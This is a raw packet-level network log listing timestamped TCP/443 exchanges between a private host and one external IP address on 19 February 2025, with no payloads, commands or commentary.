Feb 19, 2025 20:56:32.194500923 CET	443	49780	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:32.194602966 CET	49780	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:32.194626093 CET	443	49780	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:32.194813013 CET	49780	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:32.194839954 CET	443	49780	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:32.194977045 CET	49780	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:32.194998026 CET	443	49780	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:32.213392019 CET	49780	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:32.213426113 CET	443	49780	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:32.704714060 CET	443	49779	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:32.704772949 CET	443	49779	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:32.704821110 CET	49779	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:32.704847097 CET	49779	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:32.705751896 CET	49779	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:32.705770969 CET	443	49779	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:33.386296988 CET	443	49780	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:33.386414051 CET	49780	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:33.386439085 CET	443	49780	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:33.386464119 CET	443	49780	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:33.386495113 CET	49780	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:33.386540890 CET	49780	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:33.387419939 CET	49780	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:33.387435913 CET	443	49780	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:33.732172966 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:33.732230902 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:33.732362032 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:33.732614994 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:33.732628107 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.381114006 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.381189108 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.381624937 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.381640911 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.383238077 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.383246899 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.383332968 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.383348942 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.383419037 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.383438110 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.383460999 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.383493900 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.383563042 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.383588076 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.383596897 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.383618116 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.383707047 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.383816957 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.383853912 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.383872986 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.383927107 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.383968115 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.384076118 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.384098053 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.384118080 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.384129047 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.384154081 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.384212971 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.384234905 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.384243965 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.384296894 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.384300947 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.384345055 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.384360075 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.384382963 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.384392023 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.384428024 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.384439945 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.384462118 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.384516954 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.384517908 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.384566069 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.384571075 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.384588003 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.384608984 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.384666920 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.384668112 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.384696960 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.384717941 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.384752989 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.384778023 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.384808064 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.384841919 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.384856939 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.384881973 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.384942055 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.384965897 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.385021925 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.395916939 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.396023989 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.396033049 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.396107912 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.396131039 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.396171093 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.396208048 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.396294117 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.396311045 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.396487951 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.396615982 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.396631956 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.396687031 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.396739006 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.396769047 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.396913052 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.396931887 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.397126913 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.401772022 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.401875019 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.401885033 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.401956081 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.401984930 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.402015924 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.402039051 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.402120113 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.402144909 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.402230978 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.402231932 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.402307987 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.402319908 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.402367115 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.402398109 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.402482986 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.405402899 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.405488014 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.405507088 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.405580997 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.405605078 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.405637980 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.405807018 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.405831099 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.405977964 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.406083107 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.406188011 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.406222105 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.406346083 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.406446934 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.406582117 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.408127069 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.408164978 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.408356905 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.408482075 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.408703089 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.408827066 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.408999920 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.409226894 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.409334898 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.409504890 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.409543991 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.409564018 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.409718990 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.409754038 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.409765959 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.413642883 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.413815022 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.413852930 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.414098978 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.414211035 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.414472103 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.414490938 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.414513111 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.414638042 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.455370903 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.455485106 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.455517054 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.462249994 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.462294102 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.462385893 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.462517977 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.462668896 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.462779045 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.462843895 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.462889910 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.463104963 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.463160038 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.463241100 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.463263035 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.463351011 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.463402987 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.463435888 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.463504076 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.463551044 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.478473902 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.478547096 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.478648901 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.478718996 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.478878021 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.478883028 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.478913069 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.479015112 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.479044914 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.479070902 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.479104996 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.479111910 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.479162931 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.479207039 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.479263067 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.479414940 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.519364119 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.519500017 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.522182941 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.522226095 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.522330999 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.522406101 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.522444010 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.522550106 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.522658110 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.522689104 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.522764921 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.522809982 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.522948027 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.523031950 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.523067951 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.523099899 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.523179054 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.523211956 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.523349047 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.523461103 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.523518085 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.523648024 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.523758888 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.523837090 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.523924112 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.564934969 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.565248013 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.565263033 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.565350056 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.565378904 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.565466881 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.565486908 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.565511942 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.565558910 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.565572977 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.565615892 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.565617085 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.565634966 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.565673113 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.565695047 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.565728903 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.565817118 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.565921068 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.565963984 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.566075087 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.566117048 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.566160917 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.566265106 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.611330032 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.624916077 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.625082016 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.625237942 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.625427961 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.625458956 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.625786066 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.651257038 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.651290894 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.651330948 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.651351929 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.651371956 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.651391983 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.674303055 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.674916983 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.685941935 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.685977936 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.686009884 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.686021090 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.686042070 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.686054945 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.686126947 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.686131954 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.686150074 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.686165094 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.686172962 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.686192989 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.686243057 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.686266899 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.686268091 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.686317921 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.686317921 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.686357021 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.686404943 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.686414003 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.686441898 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.686480999 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.686536074 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.686563015 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.686614990 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.686652899 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.686698914 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.686749935 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.686790943 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.692817926 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.693005085 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.693042994 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.693171024 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.693296909 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.693397999 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.693547010 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.693644047 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.693680048 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.693768978 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.693824053 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.693898916 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.693949938 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.693986893 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.694081068 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.694117069 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.694152117 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.694225073 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.694273949 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.694308996 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.694380999 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.694495916 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.694566965 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.694586992 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.694653034 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.694668055 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.694734097 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.694750071 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.694818974 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.694833040 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.694896936 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.694910049 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.694969893 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.746412992 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.746673107 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.746798038 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.746926069 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.747050047 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.747087955 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.747195005 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.747364998 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.747400999 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.747430086 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.747517109 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.747638941 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.747728109 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.747773886 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.747864008 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.747966051 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.748038054 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.748078108 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.748212099 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.749608994 CET	49781	443	192.168.2.4	116.202.180.73
